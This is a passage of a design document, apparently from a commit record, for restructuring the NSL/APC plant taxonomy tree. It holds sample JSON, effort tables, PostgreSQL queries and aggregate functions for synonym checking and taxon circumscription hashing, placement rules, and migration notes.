using terminology like \"subnodes\", links and some random\nRDF stuff.\n\nhttps:\/\/biodiversity.org.au\/nsl\/services\/node\/apni\/9159708.json\n\nMost of the following snippet is useless to anyone consuming the data.\n\n[source,javascript]\n.node_snippet.js\n----\n{\n \"class\": \"au.org.biodiversity.nsl.Link\",\n \"typeUri\": {\n \"idPart\": \"btOf\",\n \"nsPart\": \"apc-voc\",\n \"uri\": \"http:\/\/biodiversity.org.au\/voc\/apc\/APC#btOf\",\n \"uriEncoded\": \"http%3A%2F%2Fbiodiversity.org.au%2Fvoc%2Fapc%2FAPC%23btOf\",\n \"qname\": \"apc-voc:btOf\",\n \"css\": \"apc-voc bt-of\"\n },\n \"subNode\": {\n \"class\": \"au.org.biodiversity.nsl.Node\",\n \"_links\": {\n \"permalink\": {\n \"link\": \"https:\/\/id.biodiversity.org.au\/node\/apni\/9159707\",\n \"preferred\": true,\n \"resources\": 1\n }\n },\n \"id\": 9159707,\n \"type\": \"T\",\n \"typeUri\": {\n \"idPart\": \"ApcConcept\",\n \"nsPart\": \"apc-voc\",\n \"uri\": \"http:\/\/biodiversity.org.au\/voc\/apc\/APC#ApcConcept\",\n \"uriEncoded\": \"http%3A%2F%2Fbiodiversity.org.au%2Fvoc%2Fapc%2FAPC%23ApcConcept\",\n \"qname\": \"apc-voc:ApcConcept\",\n \"css\": \"apc-voc apc-concept\"\n }\n },\n \"linkSeq\": 1,\n \"versioningMethod\": {\n \"enumType\": \"au.org.biodiversity.nsl.VersioningMethod\",\n \"name\": \"V\"\n },\n \"isSynthetic\": true\n},\n\n----\n\nWe'll replace the html page with something very similar for now and completely restructure the JSON output to better\nrepresent the taxon in the context of the tree.\n\ne.g.\n\n[source,javascript]\n.treeElement.js\n----\n{\n\n \"treeElement\": {\n \"class\": \"au.org.biodiversity.nsl.TreeElement\",\n \"_links\": {\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479620\",\n \"taxonLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/node\/apni\/2908938\",\n \"parentElementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479431\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/650575\",\n \"sourceElementLink\": null\n },\n \"tree\": {\n \"class\": \"au.org.biodiversity.nsl.Tree\",\n \"_links\": {\n \"permalinks\": [\n {\n \"link\": \"https:\/\/test-id-vasc.biodiversity.org.au\/tree\/apni\/APC\",\n \"preferred\": true,\n \"resources\": 1\n }\n ]\n },\n \"audit\": null,\n \"name\": \"APC\"\n },\n \"simpleName\": \"Juncaginaceae\",\n \"rankPath\": {\n \"Ordo\": {\n \"id\": 214965.0,\n \"name\": \"Alismatales\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/214965\"\n },\n \"Regnum\": {\n \"id\": 54717.0,\n \"name\": \"Plantae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54717\"\n },\n \"Classis\": {\n \"id\": 223519.0,\n \"name\": \"Equisetopsida\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/223519\"\n },\n \"Familia\": {\n \"id\": 54576.0,\n \"name\": \"Juncaginaceae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\"\n },\n \"Division\": {\n \"id\": 224706.0,\n \"name\": \"Charophyta\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/224706\"\n },\n \"Superordo\": {\n \"id\": 216053.0,\n \"name\": \"Lilianae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/216053\"\n },\n \"Subclassis\": {\n \"id\": 214954.0,\n \"name\": \"Magnoliidae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/214954\"\n }\n },\n \"namePath\": \"Plantae\/Charophyta\/Equisetopsida\/Magnoliidae\/Lilianae\/Alismatales\/Juncaginaceae\",\n \"displayString\": \"<data><scientific><name id='54576'><element class='Juncaginaceae'>Juncaginaceae<\/element> <authors><author id='7128' title='Richard, L.C.M.'>Rich.<\/author><\/authors><\/name><\/scientific><citation>CHAH (2008), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"sourceShard\": \"APNI\",\n \"synonyms\": null,\n \"profile\": {\n \"APC Dist.\": {\n \"value\": \"WA (naturalised), NT, SA, Qld, NSW (native and naturalised), LHI, ACT, Vic (native and naturalised), Tas\",\n \"created_at\": \"2009-09-08T00:00:00+10:00\",\n \"created_by\": \"KIRSTENC\",\n \"updated_at\": \"2009-09-08T00:00:00+10:00\",\n \"updated_by\": \"KIRSTENC\",\n \"source_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instanceNote\/apni\/1110848\"\n }\n },\n \"children\": [\n {\n \"displayHtml\": \"<data><scientific><name id='54576'><element class='Juncaginaceae'>Juncaginaceae<\/element> <authors><author id='7128' title='Richard, L.C.M.'>Rich.<\/author><\/authors><\/name><\/scientific><citation>CHAH (2008), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479620\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/650575\",\n \"excluded\": false,\n \"depth\": 7,\n \"synonymsHtml\": \"<synonyms><\/synonyms>\"\n },\n\n ...\n\n {\n \"displayHtml\": \"<data><scientific><name id='215455'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6955' title='Ewart, A.J.'>Ewart<\/author><\/authors><\/name><\/scientific><citation>CHAH (2006), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479645\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/215455\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/635661\",\n \"excluded\": false,\n \"depth\": 9,\n \"synonymsHtml\": \"<synonyms><tax><scientific><name id='103161'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6955' title='Ewart, A.J.'>Ewart<\/author><\/authors><\/name><\/scientific> <type>taxonomic synonym<\/type><\/tax><tax><scientific><name id='7377413'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6833' title='Gardner, C.A.'>C.A.Gardner<\/author><\/authors><\/name><\/scientific> <type>taxonomic synonym<\/type><\/tax><\/synonyms>\"\n }\n ]\n }\n\n}\n----\n\n\n\n==== Editor\n\n|===\n|work| notes| effort\n|convert views| mostly simple changes but need to handle node type| 10h\n|refactor models| the DB models need to be replaced with new models hopefully returning only relevant data| 40h\n|refactor the tree editing tab| with the refactoring of the tree edit service end points this should be a minimal change\nonly replacing some of the reference keys like the voc:AcpComment stuff.| 40h\n|||90h\n|===\n\nThe editor uses views to check if a name is currently accepted:\n\n * accepted_name_vw\n * accepted_synonym_vw\n\nWe would need to change code around type_code which relates directly to tree_node.type_uri_id_part.\n\nThe editor also models\n\n * TreeArrangement\n * TreeLink\n * TreeNode\n * TreeUriNs\n * TreeValueUri\n * AcceptedConcept\n * AcceptedInSomeWay\n\nwhich would all need refactoring for usage.\n\nThere are two different editors for the tree in the instance editor, the current AngularJS based one can be removed\ncompletely and be replaced with the workspace based one that uses the following service end points:\n\n * treeEdit\/updateValue\n * treeEdit\/placeNameOnTree\n * treeEdit\/removeNameFromTree\n\n==== New tree editor\n\n|===\n|work| notes| effort\n|Add admin tasks to admin pages| This should be a straightforward form| 20h\n|Add a tree view| This should already be part of the new tree_element object display replacing the node object| included\n|re work validation code| see services | included\n|||20h\n|===\n\nThis editor needs to be incorporated in the instance editor. The new structure will make this easier, but this is\npossibly not required in the first iteration of this change.\n\nBasically we need to be able to create trees and workspaces and publish or delete a workspace. Create and delete are\npart of the existing API on the services.\n\nWe will make the basic tree administration part of the existing services and incorporate the editing into the instance\neditor. We will develop a tree view for both the editor and services - where the editor view will allow access to\ninstance editing etc.\n\nWe will re-implement the validation code on the new tree structure as a callable service, and as part of the placement\nactions.\n\n==== New search\n\n|===\n|work| notes| effort\n|convert views| mostly simple changes but need to handle node type| 10h\n|refactor models| the DB models need to be replaced with new models hopefully returning only relevant data| 40h\n|||50h\n|===\n\nThe new search app uses the following views:\n\n * accepted_name_vw\n * accepted_synonym_vw\n * instance_resource_vw\n * name_instance_vw\n * name_or_synonym_vw\n\nIt models:\n\n * TreeArrangement\n * TreeNode\n\n== Other stuff\nAt the moment the name tree has namespaces and the lichen name tree has 31 Fungi name spaced names. This doens't work at\nthe moment as a tree can only have one name space. I have changed the lichen names to all have the same namespace (Lichen)\nso that the current name tree works kind of....\n\nBut this is going to bring up a problem we'll have to deal with where we have intersecting trees.\n\n== Query Examples\n\nThis section is for documenting some query examples using the new tree structure.\n\n=== Search for synonyms of a type in a tree\n\n[source,sql]\n.search-synonyms.sql\n----\nSELECT\n el.name_id,\n el.simple_name,\n tax_syn,\n synonyms ->> tax_syn,\n rank.name,\n type.name,\n el.name_path\nFROM tree_element el\n JOIN name n ON el.name_id = n.id\n JOIN name_rank rank ON n.name_rank_id = rank.id\n JOIN name_type type ON n.name_type_id = type.id\n ,\n jsonb_object_keys(synonyms) AS tax_syn\nWHERE tree_version_id = 144\n AND type.scientific\n AND tax_syn ILIKE 'Billardiera b%'\n AND synonyms -> tax_syn ->> 'type' = 'taxonomic synonym'\nORDER BY el.name_path;\n----\n\n|===\n| name_id | simple_name | tax_syn | syn_data | rank | type| name_path\n|55543|Billardiera scandens|Billardiera brachyantha|\"{\"\"type\"\": \"\"taxonomic synonym\"\", \"\"name_id\"\": 230111}\"|Species|scientific| Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Billardiera scandens\n|55543|Billardiera scandens|Billardiera brachyantha var. brachyantha|\"{\"\"type\"\": \"\"taxonomic synonym\"\", \"\"name_id\"\": 55168}\"|Species|scientific|Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Billardiera scandens\n|84869|Marianthus bicolor|Billardiera bicolor var. lineata|\"{\"\"type\"\": \"\"taxonomic synonym\"\", \"\"name_id\"\": 55149}\"|Species|scientific|Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Marianthus bicolor\n\n|===\n\n=== find leaf paths\n\n[source]\n.leaf-paths.sql\n----\n-- find leaf paths\nSELECT e.tree_path as paths\nFROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\nwhere tve.tree_version_id = 9451356\n and not exists(select 1 from tree_version_element ctve join tree_element ce on ctve.tree_element_id = ce.id\nwhere ctve.tree_version_id = 9451356 and ce.parent_element_id = e.id)\nORDER BY e.tree_path\n----\n\n=== circumscribe a taxon at a version\n\nThis function takes a tree version id and a tree_path and gives a sha256 hash of all the leaf node child paths. The\neffectively gives a comparable hash of the circumscription of this taxon which can be used as an identifier that can\ncompare the taxon concept here.\n\n[source]\n.circumscribe.sql\n----\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS TEXT\nLANGUAGE SQL\nAS\n$$\nSELECT encode(digest(string_agg(paths, ''), 'sha256'), 'hex')\nFROM (\n SELECT e.tree_path AS paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.tree_path LIKE path_match || '%'\n ORDER BY e.tree_path\n ) AS circumscription;\n$$;\n\nselect circumscribe(9451356, '\/9451389');\n----\n\nor better still using the simple sha256agg function\n\n[source]\n.circumscribe.sql\n----\nCREATE EXTENSION pgcrypto;\n\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS TEXT\nLANGUAGE SQL\nAS\n$$\nSELECT sha256_agg(paths)\nFROM (\n SELECT e.tree_path AS paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.tree_path LIKE path_match || '%'\n ORDER BY e.tree_path\n ) AS circumscription;\n$$;\n----\n\n=== A simple md5_agg aggregate function\n\n[source]\n.md5_agg.sql\n----\nDROP AGGREGATE IF EXISTS md5_agg( TEXT );\nDROP FUNCTION IF EXISTS md5agg_sfunc( TEXT, TEXT );\nDROP FUNCTION IF EXISTS md5agg_finalfunc( TEXT );\n\nCREATE FUNCTION md5agg_sfunc(agg_state TEXT, el TEXT)\n RETURNS TEXT\nIMMUTABLE\nLANGUAGE plpgsql\nAS $$\nDECLARE\n current_sum TEXT;\nBEGIN\n -- RAISE NOTICE 'current state %', agg_state;\n current_sum := md5(coalesce(agg_state, '') || el);\n -- raise notice 'agg state %',current_sum;\n RETURN current_sum;\nEND;\n$$;\n\nCREATE FUNCTION md5agg_finalfunc(agg_state TEXT)\n RETURNS TEXT\nIMMUTABLE\nSTRICT\nLANGUAGE plpgsql\nAS $$\nBEGIN\n RETURN agg_state;\nEND;\n$$;\n\nCREATE AGGREGATE md5_agg ( TEXT )\n(\nSFUNC = md5agg_sfunc,\nSTYPE = TEXT,\nFINALFUNC = md5agg_finalfunc\n);\n----\n\n=== A simple sha256_agg function\n\n[source]\n.sha256_agg.sql\n----\nDROP AGGREGATE IF EXISTS sha256_agg( TEXT );\nDROP FUNCTION IF EXISTS sha256agg_sfunc( TEXT, TEXT );\nDROP FUNCTION IF EXISTS sha256agg_finalfunc( TEXT );\n\nCREATE FUNCTION sha256agg_sfunc(agg_state TEXT, el TEXT)\n RETURNS TEXT\nIMMUTABLE\nLANGUAGE plpgsql\nAS $$\nDECLARE\n current_sum TEXT;\nBEGIN\n -- RAISE NOTICE 'current state %', agg_state;\n current_sum := encode(digest((coalesce(agg_state, '') || el), 'sha256'), 'hex');\n -- raise notice 'agg state %',current_sum;\n RETURN current_sum;\nEND;\n$$;\n\nCREATE FUNCTION sha256agg_finalfunc(agg_state TEXT)\n RETURNS TEXT\nIMMUTABLE\nSTRICT\nLANGUAGE plpgsql\nAS $$\nBEGIN\n RETURN agg_state;\nEND;\n$$;\n\nCREATE AGGREGATE sha256_agg ( TEXT )\n(\nSFUNC = sha256agg_sfunc,\nSTYPE = TEXT,\nFINALFUNC = sha256agg_finalfunc\n);\n----\n\n=== To sum the total data size of the tree_element table\n\n[source]\n.sum_tree_element.sql\n----\nselect\n pg_size_pretty(sum(pg_column_size(tree_version_id))) as tree_version_id_size,\n pg_size_pretty(sum(pg_column_size(tree_element_id))) as tree_element_id_size,\n pg_size_pretty(sum(pg_column_size(lock_version))) as lock_version_size,\n pg_size_pretty(sum(pg_column_size(display_string))) as display_string_size,\n pg_size_pretty(sum(pg_column_size(element_link))) as element_link_size,\n pg_size_pretty(sum(pg_column_size(excluded))) as excluded_size,\n pg_size_pretty(sum(pg_column_size(instance_id))) as instance_id_size,\n pg_size_pretty(sum(pg_column_size(instance_link))) as instance_link_size,\n pg_size_pretty(sum(pg_column_size(name_id))) as name_id_size,\n pg_size_pretty(sum(pg_column_size(name_link))) as name_link_size,\n pg_size_pretty(sum(pg_column_size(name_path))) as name_path_size,\n pg_size_pretty(sum(pg_column_size(names))) as names_size,\n pg_size_pretty(sum(pg_column_size(parent_version_id))) as parent_version_id_size,\n pg_size_pretty(sum(pg_column_size(parent_element_id))) as parent_element_id_size,\n pg_size_pretty(sum(pg_column_size(previous_version_id))) as previous_version_id_size,\n pg_size_pretty(sum(pg_column_size(previous_element_id))) as previous_element_id_size,\n pg_size_pretty(sum(pg_column_size(profile))) as profile_size,\n pg_size_pretty(sum(pg_column_size(rank_path))) as rank_path_size,\n pg_size_pretty(sum(pg_column_size(simple_name))) as simple_name_size,\n pg_size_pretty(sum(pg_column_size(source_element_link))) as source_element_link_size,\n pg_size_pretty(sum(pg_column_size(source_shard))) as source_shard_size,\n pg_size_pretty(sum(pg_column_size(synonyms))) as synonyms_size,\n pg_size_pretty(sum(pg_column_size(tree_path))) as tree_path_size,\n pg_size_pretty(sum(pg_column_size(updated_at))) as updated_at_size,\n pg_size_pretty(sum(pg_column_size(updated_by))) as updated_by_size\n from tree_element;\n----\n\n=== To find the total used sizes of tables in the database\n\n[source]\n.table_size.sql\n----\nSELECT\n *,\n pg_size_pretty(total_bytes) AS total,\n pg_size_pretty(index_bytes) AS INDEX,\n pg_size_pretty(toast_bytes) AS toast,\n pg_size_pretty(table_bytes) AS TABLE\nFROM (\n SELECT\n *,\n total_bytes - index_bytes - COALESCE(toast_bytes, 0) AS table_bytes\n FROM (\n SELECT\n c.oid,\n nspname AS table_schema,\n relname AS TABLE_NAME,\n c.reltuples AS row_estimate,\n pg_total_relation_size(c.oid) AS total_bytes,\n pg_indexes_size(c.oid) AS index_bytes,\n pg_total_relation_size(reltoastrelid) AS toast_bytes\n FROM pg_class c\n LEFT JOIN pg_namespace n ON n.oid = c.relnamespace\n WHERE relkind = 'r' and nspname = 'public'\n ) a\n ) a;\n----\n\n=== fix the depth of all elements in a tree version\n\n[source:sql]\n.update depth.sql\n----\nDO $$\nDECLARE\n c CURSOR FOR\n SELECT tve.parent_id\n FROM tree_version_element tve\n JOIN tree ON tve.tree_version_id = tree.default_draft_tree_version_id AND tree.name = 'APC'\n ORDER BY tve.tree_path\n FOR UPDATE;\nBEGIN\n FOR row IN c LOOP\n UPDATE tree_version_element\n SET depth = coalesce ((select depth + 1 from tree_version_element where element_link = row.parent_id), 1)\n WHERE CURRENT OF c;\n END LOOP;\nEND\n$$\n----\n\nThis works, but sets the depth assuming the top element has the correct depth. The below solution\nis better because it uses the tree_path to set the depth by counting the number of '\/' chars\n\n[source:sql]\n.update depth.sql\n----\nUPDATE tree_version_element\nSET depth = array_length(regexp_split_to_array(tree_path, '\/'),1) - 1\nWHERE tree_version_id = 50617332\nAND tree_path ~ '\/50617337';\n----\n\n== Placement Rules\n\nNOTE: there is a new more succinct document \"<<placement-rules.adoc>>\" which is based directly on the new implementation\nafter we've tested and reviewed the results with users. Consider this document to be the before picture and that as the\nafter.\n\nThis is an interpretation of the results of the discussion at https:\/\/www.anbg.gov.au\/ibis25\/display\/NSL\/Tree+Monitor+Functionality\nregarding the placement rules.\n\nThis is from the point of view of attempting to place an instance on a version of a tree. The version of the tree must\nbe consistent within these rules. We take it that an Instance == Concept == Taxon == Taxon concept. The Instance being\nplaced as already been chosen appropriately in an editor.\n\nWARNING: we need to look at the difference between validating a placement, before it's been placed and validating a\nwhole tree that already has been created.\n\n=== The Taxon should not already be on the tree\n=== A Taxon's Name can not be in the tree as an accepted name more than once\n=== The Taxon's Name Rank must be below the parent taxon's rank\n=== A relationship instance can't be put on the tree\n=== Polynomial names must be a child of the name parent except excluded names\n\ne.g. Doodia caudata must be placed under Doodia\n\n=== Hybrid names must be a child of the first hybrid name\n\ne.g. Blechnum cartilagineum Sw. x Doodia media R.Br. must be placed under Blechnum cartilagineum\n\n=== An accepted name can't be placed under an excluded name\n\nAll names above an accepted name must also be accepted.\n\n=== illegal and illegitimate names *should not* be placed on the tree\n\nThis is a warning only because there are illegitimate names used in APC because a phrase name would have to be created.\n\n\n=== A Taxon's Name or Synonyms can only be in the tree once.\n\nchecking for synonyms needs to be done from a point of view. For example with Ficus virens\n(see https:\/\/biodiversity.org.au\/nsl\/services\/search?product=APC&tree.id=1133571&name=Ficus+virens&inc._scientific=&inc.scientific=on&inc._cultivar=&inc._other=&max=100&display=apc&search=true)\n\nFicus virens var. sublanceolata (Miq.) Corner is a synonym of Ficus virens according to CHAH 2005, but not according to\nCHAH 2016 which has them as distinct taxa (so they can both be accepted). The existing code for findSynonymOfInstance\nchecks if a placed instance is cited by the instance you wish to place in any reference (other relationship instance).\nIf you try to place Ficus virens Aiton (CHAH 2016) it will bring up the CHAH 2005 instance, which isn't relevant because\nyou're view (sensu) is CHAH 2016.\n\nSo we should check synonymy from the point of view of the taxa being placed and then the already placed taxa back to the\ntaxa being placed, e.g. from Ficus virens var. sublanceolata\n\nTo warn on taxonomic synonyms we need to check the name of the instance. For example if you try to place Woodwardia Sm.\nunder Blechnaceae using Mueller, F.J.H. von (1882), Systematic Census of Australian Plants which considers Doodia R.Br.\nto be a Synonym, but the instance of Doodia on the tree does not consider woodwardia a taxonmic synonym you won't see\nthe apparently obvious conflict in this placement because the cited instance is not on the tree. So if the instance being\nplaced cites a Name as being a synonym we should probably warn the user.\n\n* relationship instances can't be placed on the accepted tree\n* misapplication synonyms can be ignored.\n* warn if pro. parte synonyms exist elsewhere in the current tree\n\n=== A name once on the tree should always be accounted for on the tree\n\nA name *should* not be removed from a tree, it should be accounted for within the accepted names or synonyms.\n\n==== Implementation within the tree\n\nThe Synonyms field in the Tree Element shows the synonym name and the type. We need to use the synonyms JSON structure to\ndetermine if the name exists as a synonym in the context of what is on the tree currently and that no synonyms of the taxon\nbeing placed are on the tree.\n\nSo if we try and place 'Ficus cunninghami' we might use...\n\n[source]\n.find-synonym-of.sql\n----\nSELECT\n el.name_id,\n el.simple_name,\n tax_syn,\n synonyms ->> tax_syn,\n el.names,\n el.name_path\nFROM tree_element el\n JOIN name n ON el.name_id = n.id,\n jsonb_object_keys(synonyms) AS tax_syn\nWHERE tree_version_id = 146\n AND el.names like '%|Ficus cunninghami|%'\n AND synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte).*'\n and tax_syn = 'Ficus cunninghami'\n----\n\nWhich takes around 60-70ms to find Ficus virens. Note the LIKE on el.names limits the search quickly before using the slower\njsonb queries, and is quicker than the equivalent regex.\n\n[source]\n.explain\n----\nNested Loop (cost=0.98..127531.08 rows=3 width=342)\n -> Nested Loop (cost=0.98..127525.04 rows=3 width=310)\n -> Index Scan using tree_element_pkey on tree_element el (cost=0.56..127511.69 rows=3 width=310)\n Index Cond: (tree_version_id = 146)\n Filter: (names ~~ '%|Ficus cunninghami|%'::text)\n -> Index Only Scan using name_pkey on name n (cost=0.42..4.44 rows=1 width=8)\n Index Cond: (id = el.name_id)\n -> Function Scan on jsonb_object_keys tax_syn (cost=0.00..2.00 rows=1 width=32)\n Filter: ((tax_syn = 'Ficus cunninghami'::text) AND (((el.synonyms -> tax_syn) ->> 'type'::text) !~ '.*(misapp|pro parte).*'::text))\n----\n\nif we repeat that search for all the names in the el.names string for the name we're trying to place, then we would have\nfound all matching names both ways.\n\nSo for example we can find all the clashing synonyms for an instance using:\n\n[source]\n.find_synonyms\n----\nSELECT\n el.name_id,\n el.simple_name,\n tax_syn,\n synonyms -> tax_syn ->> 'type' as syn_type,\n synonyms -> tax_syn ->> 'name_id' as syn_id\nFROM tree_element el\n JOIN name n ON el.name_id = n.id,\n jsonb_object_keys(synonyms) AS tax_syn\nWHERE tree_version_id = 146\n AND synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte).*'\n and tax_syn in (select synonym.simple_name as sn\nfrom Instance s join instance_type it on s.instance_type_id = it.id,\n Name synonym\nwhere s.cited_by_id = :instance_id_to_place\n and synonym.id = s.name_id\n and it.misapplied = FALSE\n and it.pro_parte = FALSE\n);\n----\n\nUsing the above if we try and place Ficus virens var. sublanceolata sensu Jacobs & Packard (1981) plants of NSW instance 692695\nwe get the results:\n\n|===\n|name_id|simple_name|tax_syn|syn_type|syn_id\n\n|75398|Ficus virens|Ficus cunninghamii|taxonomic synonym|90744\n|75398|Ficus virens|Ficus infectoria var. cunninghamii|taxonomic synonym|91343\n|===\n\n==== Checking the validity of an existing tree\n\nCheck all names in the tree for synonyms of that name in the tree:\n(See https:\/\/www.anbg.gov.au\/25jira\/browse\/NSL-2484)\n\n[source]\n.findSynonyms in tree\n----\n-- updated for tree_version_element join table\nSELECT\n e1.simple_name AS name1,\n e1.name_id,\n e2.simple_name AS name2,\n e2.name_id,\n tax_syn AS name2_synonym,\n e2.synonyms -> tax_syn ->> 'type' AS type\nFROM tree t,\n tree_version_element tve1\n JOIN tree_element e1 ON tve1.tree_element_id = e1.id\n ,\n tree_version_element tve2\n JOIN tree_element e2 ON tve2.tree_element_id = e2.id\n ,\n jsonb_object_keys(e2.synonyms) AS tax_syn\nWHERE t.name = 'APC'\n AND tve1.tree_version_id = t.current_tree_version_id\n AND tve2.tree_version_id = t.current_tree_version_id\n AND tve2.tree_element_id <> tve1.tree_element_id\n AND e1.excluded = FALSE\n AND e2.excluded = FALSE\n AND e2.synonyms IS NOT NULL\n AND (e2.synonyms -> tax_syn ->> 'name_id') :: BIGINT = e1.name_id\n AND e2.synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte|common).*';\n----\n\nNOTE: we've used the current APC tree above.\n\n== Running the migration\n\nThe services will run a migration script on startup which will alter the DDL adding tables and indexes. It will then\nmigrate all the nodes and versions over as well as setting the family of the names. It will use the preferred host from\nthe mapper to set the links in the tree_element and tree_version_element tables, which means we probably have to manually\ndo this for the moss and lichen shards.\n\nWARNING: *BEFORE you run the services\/upgrade script make sure the preferred host is set correctly if you're running it locally\nor in test.*\n\nAfter the upgrade script has run we need to run the \"tree-element-mapper-links.sql\" script to add all the mapper links.\n\nNOTE: need to delete from notification due to all the changes to name.","old_contents":"= New tree structure\nv1.0, June 2017\n:imagesdir: resources\/images\/\n:toc: left\n:toclevels: 4\n:toc-class: toc2\n:icons: font\n:iconfont-cdn: \/\/cdnjs.cloudflare.com\/ajax\/libs\/font-awesome\/4.3.0\/css\/font-awesome.min.css\n:stylesdir: resources\/style\/\n:stylesheet: asciidoctor.css\n:description: New tree structure documentation\n:keywords: documentation, NSL, APNI, API, APC, tree\n:links:\n:numbered:\n\nThe current tree structure is over complicated and difficult to validate and maintain going forward. The reasons for this\nare many, but basically come down to changing understanding of requirements.\n\nI propose to scale back and simplify the structure used to store the trees and to only implement what is currently required,\nthen evolve the implementation as needed.\n\nThe main change in requirements is the idea of using a workspace, or draft tree, to do work. The workspace would then be\npublished as a new version. once a version is published it is immutable _except_ for minor typographical changes as determined\nby policy.\n\n\nIMPORTANT: This work is designed to make the tree easy to understand and reason about, and therefore make it easier to\nchange and maintain over time, and improve performance.\n\n== Requirements\n\n=== Major requirements:\n\n . The tree must store and display the parent child taxonomic relationship between names.\n . The tree must be versioned so that a citation (id) of a tree element must reproduce the tree as it was when it was\n viewed.\n . A link to an element on the tree should be able to identify the version of the tree and reproduce that version.\n . You should be able to link to a _version_ of the tree and get the current tree easily.\n .. You should be able to compare taxa in different version via an identifier. The identifier is unique to the _circumscribed_\n or enclosed taxa below this taxa. This identifier spans multiple versions of a tree. See <<taxon identifiers>>\n . The tree must enforce strict rules about the placement of names on a tree.\n . Profile data including only Comment and Distribution data is to be stored in the tree structure.\n . Tree elements are pointers to an Instance as a representation of a Taxon Concept.\n . Tree elements can represent Accepted and Excluded items which need to be distinguished. This appears to be accepted\n and not accepted, but treated. The \"Excluded\" is a covering term of a number of reasons these names are not accepted\n (e.g. doubtful) but the distinction is not required. As such for now we can just indicate an element is Accepted or Not.\n . Easy to work with a version of the tree.\n . All common operations must be fast. You should be able to query the status of a name on the current tree without\n noticeable delay.\n . Editors should be able to work on a draft version of the tree without it being public, then publish it at a time of\n their choosing.\n . Versions should be released as a unit of work, collecting a set of changes together (policy).\n . The users need to be able to add a log entry describing the work done and referencing the documents that lead to the changes.\n . Multiple workspaces that can be merged over different time frames is a requirement.\n . It would be nice to be able to list and view older version of the tree and see what changed (diffing)\n . It would be nice to be able to archive older versions of the tree without breaking it.\n . we want to access the trees through RDF.\n\n==== Uber trees\n\n . we must be able to create an \"uber tree\" from multiple sub trees.\n . The uber tree should be able to merge sub trees from multiple points - for example lichens have multiple connections\n the the fungi tree.\n . Uber tree elements need to Link back to source tree nodes if compositional.\n\naccording to https:\/\/www.environment.gov.au\/science\/abrs\/publications\/other\/numbers-living-species\/executive-summary[ABRS Numbers of Living Species in Australia and the World]\nthere are ~2million species in the world that we should aim to handle in an uber tree.\n\n==== Use cases\n\n . creation of accepted taxonomic trees with strict hierarchical placement rules within a shard.\n . creation of a list of taxon concepts commonly (only) from family down, known as a checklist, from one or more shards.\n these trees may have more relaxed placement rules.\n . creation of composite (uber) trees made from multiple sub trees, such as accepted taxonomic trees from multiple shards\n\nWARNING: We should take a closer look at the needs of List compilers and Tree composers to see if the difference in the\n set or requirements leads to different solutions for each.\n\n==== Editors\n\nBased on the above use cases, and current editor usage, it looks like we need two different editing pathways for trees.\n\n . In instance editor tree editing: Where the advanced editor can create specific taxonomic concepts for accepted trees\n in accordance with some authority such as CHAH.\n . A composition editor that can compose multiple trees into an uber tree, or create a checklist. This doesn't require the\n ability to edit instances, just choose concepts, or other tree elements\/sections.\n\nPerhaps the second, compositional, editor is logically broken into an uber tree manager and a checklist editor.\n\n==== Search\n\nWe need to clearly define the difference between the search on names (the APNI search) and the search requirements on\ntrees. At the moment there is confusion because some searches in the advanced search are mix tree and name concerns.\n\nNOTE: Greg W. put this view forward too.\n\n===== use cases\n\n . search a tree for names under a name and bring back the results displaying the apni or apc format output\n * search synonyms or accepted only\n * search based on native, naturalised, distribution or profile data.\n * further advanced filtering based on name\/instance type, tags, author etc.\n . search a tree for names independent of any tree and display in APNI format - this may be an advanced search on name types\n tags, instance types, and may require knowledge of the Family.\n . Name check 